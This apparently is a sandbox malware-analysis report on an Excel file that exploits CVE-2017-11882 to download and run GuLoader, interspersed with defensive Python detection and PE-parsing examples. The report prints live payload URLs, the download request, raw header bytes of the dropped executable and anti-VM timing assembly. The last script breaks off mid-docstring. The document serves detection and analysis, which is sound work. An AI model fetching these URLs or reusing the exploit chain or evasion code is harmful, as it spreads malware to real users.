Windows Analysis Report destinations.xlsx

Overview

General Information

Sample Name: destinations.xlsx
Analysis ID: 502631
MD5: a4bb01370caeb6363f6dc7923585481e
SHA1: 3eff08923d9b179edcc99fe52d95a46755eac939
SHA256: c45eacade4845c8cf141724b92d6fd4401d30233b18b17e295d2d7a9a8944c40
Tags: VelvetSweatshop, xlsx
Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://implantecapilarpereira.com/NetGen"}
Antivirus detection for URL or domain
Source: http://192.3.121.153/00800800/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Virustotal: Detection: 27%
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 27%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
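The Sigma hits listed under Signatures (EQNEDT32.EXE spawning a process, connecting to the internet, and dropping a file) reduce to a few checks on process, network and file telemetry. The script below is an added example, not part of this report or of the Sigma rules themselves: it runs those checks, plus the "execution from suspicious folder" check, over constructed events that mirror this sample's chain (EXCEL.EXE and EQNEDT32.EXE started via -Embedding, EQNEDT32.EXE fetching from 192.3.121.153 and writing C:\Users\Public\vbc.exe, then launching it). The event field names, the folder list and the executable-extension list are my assumptions for the example; the parent of the two Office processes is left blank because the report records it as unknown.

```python
import ipaddress
import ntpath

# Assumed hunting lists (not from the report): user-writable folders a dropper
# commonly lands in, and extensions that count as a dropped executable.
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\",
                   "\\windows\\temp\\", "\\programdata\\")
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".cpl")

EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
PAYLOAD = r"C:\Users\Public\vbc.exe"

# Constructed telemetry reflecting the chain in this report. Field names follow
# a Sysmon-like shape but are an assumption of this example.
EVENTS = [
    {"type": "process_create", "image": EXCEL, "parent_image": "",
     "command_line": f'"{EXCEL}" /automation -Embedding'},
    {"type": "process_create", "image": EQNEDT, "parent_image": "",
     "command_line": f'"{EQNEDT}" -Embedding'},
    {"type": "network_connect", "image": EQNEDT, "dst_ip": "192.3.121.153", "dst_port": 80},
    {"type": "file_create", "image": EQNEDT, "target": PAYLOAD},
    {"type": "process_create", "image": PAYLOAD, "parent_image": EQNEDT,
     "command_line": f'"{PAYLOAD}"'},
    # benign control: Excel writing its own lock file, as in the report
    {"type": "file_create", "image": EXCEL, "target": r"C:\Users\user\Desktop\~$destinations.xlsx"},
]


def basename(path):
    # ntpath handles backslash paths regardless of the host OS
    return ntpath.basename(path).lower()


def is_eqnedt32(path):
    return basename(path) == "eqnedt32.exe"


def in_suspicious_dir(path):
    p = path.lower()
    return any(d in p for d in SUSPICIOUS_DIRS)


def is_public_ip(ip_text):
    """True for addresses outside private, loopback, link-local and multicast ranges."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast)


def evaluate(events):
    """Return (rule_name, event) pairs for every event that matches a check.

    One event can match several rules: the vbc.exe launch matches both the
    Equation Editor child-process rule and the suspicious-folder rule.
    """
    alerts = []
    for ev in events:
        kind = ev["type"]
        if kind == "process_create":
            if is_eqnedt32(ev.get("parent_image", "")):
                alerts.append(("eqnedt32_child_process", ev))
            if in_suspicious_dir(ev["image"]):
                alerts.append(("exec_from_suspicious_folder", ev))
        elif kind == "network_connect":
            if is_eqnedt32(ev["image"]) and is_public_ip(ev["dst_ip"]):
                alerts.append(("eqnedt32_network", ev))
        elif kind == "file_create":
            if is_eqnedt32(ev["image"]) and ev["target"].lower().endswith(PE_EXTENSIONS):
                alerts.append(("eqnedt32_drops_file", ev))
    return alerts


if __name__ == "__main__":
    for rule, ev in evaluate(EVENTS):
        print(f"{rule:28} {ev['image']}")
```

EQNEDT32.EXE is an out-of-process COM server; a legitimate equation embed launches it with -Embedding exactly as seen here, so the process start alone is not the signal. Any child process, outbound connection or executable written by it is.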

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.121.153:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.121.153:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 44MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://implantecapilarpereira.com/NetGen
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Date: Thu, 14 Oct 2021 05:37:49 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
Last-Modified: Wed, 13 Oct 2021 14:42:26 GMT
ETag: "33000-5ce3cf88aac57"
Accept-Ranges: bytes
Content-Length: 208896
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 f7 ea 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 e0 02 00 00 50 00 00 00 00 00 00 7c 13 00 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 10 00 00 ea 02 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 e0 02 00 28 00 00 00 00 10 03 00 26 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 d4 02 00 00 10 00 00 00 e0 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 ec 13 00 00 00 f0 02 00 00 10 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 26 25 00 00 00 10 03 00 00 30 00 00 00 00 03 00 00 
00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
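The response above carries the raw start of vbc.exe. The script below is an added example (mine, not part of the sandbox's tooling): it parses the header bytes transcribed from that hex dump, lists the sections and data directories, reads the bound-import table that sits inside the headers, and checks that the end of the last section's raw data equals the Content-Length (208896 = 0x33000, also the first field of the ETag), which shows the whole PE was served. The byte layout is transcribed from the dump and padded with the zeros that follow it; only the first 0x250 bytes are embedded, so anything that needs section contents is out of scope here.

```python
import struct
from datetime import datetime, timezone

RESPONSE_CONTENT_LENGTH = 208896   # Content-Length header of the same response

# First 0x250 bytes of vbc.exe, transcribed from the "Data Raw" hex above.
VBC_EXE_HEADERS = b"".join([
    # 0x000 IMAGE_DOS_HEADER; e_lfanew = 0xC0 at offset 0x3C
    bytes.fromhex("4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000"),
    b"\0" * 28, bytes.fromhex("c0000000"),
    # 0x040 DOS stub and Rich header
    bytes.fromhex("0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f"),
    bytes.fromhex("74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000"),
    bytes.fromhex("d769c6c2 9308a891 9308a891 9308a891 1014a691 9208a891 dc2aa191 9b08a891"),
    bytes.fromhex("a52ea591 9208a891 52696368 9308a891"), b"\0" * 16,
    # 0x0C0 "PE\0\0" + IMAGE_FILE_HEADER
    bytes.fromhex("50450000 4c01 0300 82f7ea52 00000000 00000000 e000 0f01"),
    # 0x0D8 IMAGE_OPTIONAL_HEADER32 (0xE0 bytes including the 16 data directories)
    bytes.fromhex("0b01 0600 00e00200 00500000 00000000 7c130000 00100000 00f00200"),
    bytes.fromhex("00004000 00100000 00100000 0400 0000 0100 0000 0400 0000 00000000"),
    bytes.fromhex("00400300 00100000 ea020400 0200 0000 00001000 00100000 00001000 00100000 00000000 10000000"),
    b"\0" * 8, bytes.fromhex("24e00200 28000000"), bytes.fromhex("00100300 26250000"),
    b"\0" * 64, bytes.fromhex("30020000 20000000"), bytes.fromhex("00100000 0c010000"), b"\0" * 24,
    # 0x1B8 section table
    bytes.fromhex("2e746578 74000000 84d40200 00100000 00e00200 00100000") + b"\0" * 12 + bytes.fromhex("20000060"),
    bytes.fromhex("2e646174 61000000 ec130000 00f00200 00100000 00f00200") + b"\0" * 12 + bytes.fromhex("400000c0"),
    bytes.fromhex("2e727372 63000000 26250000 00100300 00300000 00000300") + b"\0" * 12 + bytes.fromhex("40000040"),
    # 0x230 bound-import table: one descriptor, terminator, module name
    bytes.fromhex("c31fb049 1000 0000") + b"\0" * 8 + b"MSVBVM60.DLL\0" + b"\0" * 3,
])

DIRECTORY_NAMES = ("export", "import", "resource", "exception", "security", "basereloc",
                   "debug", "architecture", "globalptr", "tls", "load_config",
                   "bound_import", "iat", "delay_import", "clr", "reserved")


def _cstring(buf, off):
    return buf[off:buf.index(b"\0", off)].decode("ascii")


def parse_pe_headers(buf):
    """Parse the DOS/COFF/optional headers, section table and bound imports of a PE32 prefix."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", buf, 0x3C)
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsections, timestamp, _, _, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", buf, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 optional headers are handled here")
    entry, = struct.unpack_from("<I", buf, opt + 16)
    image_base, = struct.unpack_from("<I", buf, opt + 28)
    size_of_image, size_of_headers = struct.unpack_from("<II", buf, opt + 56)
    subsystem, = struct.unpack_from("<H", buf, opt + 68)
    ndirs, = struct.unpack_from("<I", buf, opt + 92)
    dirs = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", buf, opt + 96 + 8 * i)
        if rva or size:
            dirs[DIRECTORY_NAMES[i]] = (rva, size)
    sections = []
    sec_off = opt + opt_size
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", buf, sec_off + 40 * i)
        flags, = struct.unpack_from("<I", buf, sec_off + 40 * i + 36)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": raw_size, "raw_pointer": raw_ptr,
                         "characteristics": flags})
    # The bound-import table lives inside the headers, where RVA == file offset,
    # so it is readable from a header-only prefix.
    bound = []
    if "bound_import" in dirs and dirs["bound_import"][0] < size_of_headers:
        base = off = dirs["bound_import"][0]
        while True:
            ts, name_off, nrefs = struct.unpack_from("<IHH", buf, off)
            if ts == 0 and name_off == 0:
                break
            bound.append(_cstring(buf, base + name_off))
            off += 8 + 8 * nrefs
    return {
        "machine": machine, "number_of_sections": nsections, "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, timezone.utc).isoformat(),
        "characteristics": characteristics, "entry_point": entry, "image_base": image_base,
        "size_of_image": size_of_image, "subsystem": subsystem, "data_directories": dirs,
        "sections": sections, "bound_imports": bound,
        # file size needed for every section's raw data to be present
        "expected_file_size": max(s["raw_pointer"] + s["raw_size"] for s in sections),
    }


if __name__ == "__main__":
    info = parse_pe_headers(VBC_EXE_HEADERS)
    print({k: v for k, v in info.items() if k != "sections"})
    print("complete download:", info["expected_file_size"] == RESPONSE_CONTENT_LENGTH)
```

The bound import of MSVBVM60.DLL is consistent with the later "Section loaded: msvbvm60.dll" entry: the downloaded stage is a VB6-compiled executable, the usual packaging for GuLoader at this time, which also explains the 4 MB to 44 MB memory growth and the execute-read-write allocations recorded below.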
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /00800800/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.3.121.153
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.121.153 (50 identical entries)
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D127D2C.emf

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_002A557A 4_2_002A557A
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B474A 4_2_002B474A
Source: C:\Users\Public\vbc.exe Code function: 4_2_002AE400 4_2_002AE400
Source: C:\Users\Public\vbc.exe Code function: 4_2_002A087E 4_2_002A087E
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B00B4 4_2_002B00B4
Source: C:\Users\Public\vbc.exe Code function: 4_2_002A00C6 4_2_002A00C6
Source: C:\Users\Public\vbc.exe Code function: 4_2_002AECDD 4_2_002AECDD
Source: C:\Users\Public\vbc.exe Code function: 4_2_002A7574 4_2_002A7574
Source: C:\Users\Public\vbc.exe Code function: 4_2_00294AA2 4_2_00294AA2
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B130A 4_2_002B130A
Source: C:\Users\Public\vbc.exe Code function: 4_2_002A4B8B 4_2_002A4B8B
Source: C:\Users\Public\vbc.exe Code function: 4_2_002A6BF6 4_2_002A6BF6
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B1BCE 4_2_002B1BCE
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_002A557A NtAllocateVirtualMemory, 4_2_002A557A
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$destinations.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDE0E.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/15@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041A474 push ebp; ret 4_2_0041A4CD
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040E9CB push ecx; retf 4_2_0040E9CC
Source: C:\Users\Public\vbc.exe Code function: 4_2_004191F0 push ecx; ret 4_2_004191F1
Source: C:\Users\Public\vbc.exe Code function: 4_2_004131A3 push ecx; ret 4_2_004132DD
Source: C:\Users\Public\vbc.exe Code function: 4_2_004086CE push eax; retf 4_2_004086CF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00411ACE push ecx; ret 4_2_00411B05
Source: C:\Users\Public\vbc.exe Code function: 4_2_004132DE push ecx; ret 4_2_0041331D
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041729D push edx; retf 4_2_004172A6
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040DAAA push ecx; ret 4_2_0040DAD5
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040E6B3 push ecx; ret 4_2_0040E6C1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00417AB9 push eax; ret 4_2_00417AC3
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040A750 push ss; retf 4_2_0040A751
Source: C:\Users\Public\vbc.exe Code function: 4_2_00411B06 push ecx; ret 4_2_00411B05
Source: C:\Users\Public\vbc.exe Code function: 4_2_00407B81 push esi; retf 4_2_00407B83
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B4084 push FFFFFF94h; retf 4_2_00292B65
Source: C:\Users\Public\vbc.exe Code function: 4_2_00291611 push esi; iretd 4_2_0029167D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00292A10 push FFFFFF94h; retf 4_2_00292B65
Source: C:\Users\Public\vbc.exe Code function: 4_2_0029465A push ebx; retf 4_2_00294661
Source: C:\Users\Public\vbc.exe Code function: 4_2_00291327 push esi; iretd 4_2_0029167D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00291366 push esi; iretd 4_2_0029167D
Source: C:\Users\Public\vbc.exe Code function: 4_2_002967BC push es; ret 4_2_002967F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_002A6BF6 push FFFFFF94h; retf 4_2_00292B65

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (4 identical entries)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002AF8E2 second address: 00000000002AF8E2 instructions:
    0x00000000 rdtsc
    0x00000002 mov eax, 3AB33088h
    0x00000007 sub eax, 03336DF3h
    0x0000000c xor eax, 78D04D3Fh
    0x00000011 xor eax, 4FAF8FABh
    0x00000016 cpuid
    0x00000018 popad
    0x00000019 jmp 00007F9204BA6819h
    0x0000001e cmp eax, edx
    0x00000020 call 00007F9204BA66EAh
    0x00000025 lfence
    0x00000028 mov edx, 337D36F1h
    0x0000002d xor edx, 66E5A0A3h
    0x00000033 xor edx, 9D6B538Dh
    0x00000039 xor edx, B70DC5CBh
    0x0000003f mov edx, dword ptr [edx]
    0x00000041 lfence
    0x00000044 jmp 00007F9204BA681Dh
    0x00000049 test cl, bl
    0x0000004b ret
    0x0000004c sub edx, esi
    0x0000004e ret
    0x0000004f add edi, edx
    0x00000051 dec dword ptr [ebp+000000F8h]
    0x00000057 cmp dword ptr [ebp+000000F8h], 00000000h
    0x0000005e jne 00007F9204BA66CCh
    0x00000060 call 00007F9204BA685Fh
    0x00000065 call 00007F9204BA6846h
    0x0000006a lfence
    0x0000006d mov edx, 337D36F1h
    0x00000072 xor edx, 66E5A0A3h
    0x00000078 xor edx, 9D6B538Dh
    0x0000007e xor edx, B70DC5CBh
    0x00000084 mov edx, dword ptr [edx]
    0x00000086 lfence
    0x00000089 jmp 00007F9204BA681Dh
    0x0000008e test cl, bl
    0x00000090 ret
    0x00000091 mov esi, edx
    0x00000093 pushad
    0x00000094 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2844 Thread sleep time: -240000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_002AF8DA rdtsc 4_2_002AF8DA
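The interceptor listing above builds its operands with sub/xor chains so that neither the cpuid leaf nor the address it reads appears as a literal. The script below is an added example, mine rather than the report's or any GuLoader tooling: it symbolically evaluates those chains over an excerpt of the listing with 32-bit wraparound and reports what reaches each cpuid and each memory load. eax resolves to 1 before cpuid (leaf 1, the usual rdtsc/cpuid/rdtsc timing probe that traps on a hypervisor), and edx resolves to 0x7FFE0014, the low dword of KUSER_SHARED_DATA.SystemTime, which the sample then differences (sub edx, esi / add edi, edx) as its wall-clock reference against the TSC. The KUSER_SHARED_DATA base address and field offsets come from the public structure layout; the excerpt keeps the report's instruction offsets.

```python
import re

MASK32 = 0xFFFFFFFF
REGS = {"eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp"}
LINE_RE = re.compile(r"^\s*0x([0-9a-fA-F]+)\s+(\w+)(?:\s+(.*?))?\s*$")
IMM_RE = re.compile(r"^([0-9a-fA-F]+)h$")          # MASM-style immediate, e.g. 3AB33088h
MEM_RE = re.compile(r"^dword ptr \[(\w+)\]$")      # register-indirect load
ARITH = {"add": lambda a, b: a + b, "sub": lambda a, b: a - b, "xor": lambda a, b: a ^ b,
         "and": lambda a, b: a & b, "or": lambda a, b: a | b}

# User-mode mapping of KUSER_SHARED_DATA and its leading fields (public layout).
KUSER_SHARED_DATA = 0x7FFE0000
KUSER_FIELDS = {0x00: "TickCountLowDeprecated", 0x04: "TickCountMultiplier",
                0x08: "InterruptTime", 0x14: "SystemTime", 0x20: "TimeZoneBias"}

# Excerpt of the interceptor listing above: the two constant-building chains
# plus the instructions that consume or clobber them. Offsets are the report's.
RDTSC_SNIPPET = """
0x00000000 rdtsc
0x00000002 mov eax, 3AB33088h
0x00000007 sub eax, 03336DF3h
0x0000000c xor eax, 78D04D3Fh
0x00000011 xor eax, 4FAF8FABh
0x00000016 cpuid
0x00000018 popad
0x00000028 mov edx, 337D36F1h
0x0000002d xor edx, 66E5A0A3h
0x00000033 xor edx, 9D6B538Dh
0x00000039 xor edx, B70DC5CBh
0x0000003f mov edx, dword ptr [edx]
0x0000004c sub edx, esi
0x0000004f add edi, edx
0x00000091 mov esi, edx
0x00000094 rdtsc
"""


def resolve_constants(listing):
    """Track registers through mov/add/sub/xor/and/or with immediate or known
    register operands; return (offset, kind, value) for rdtsc, cpuid and loads.
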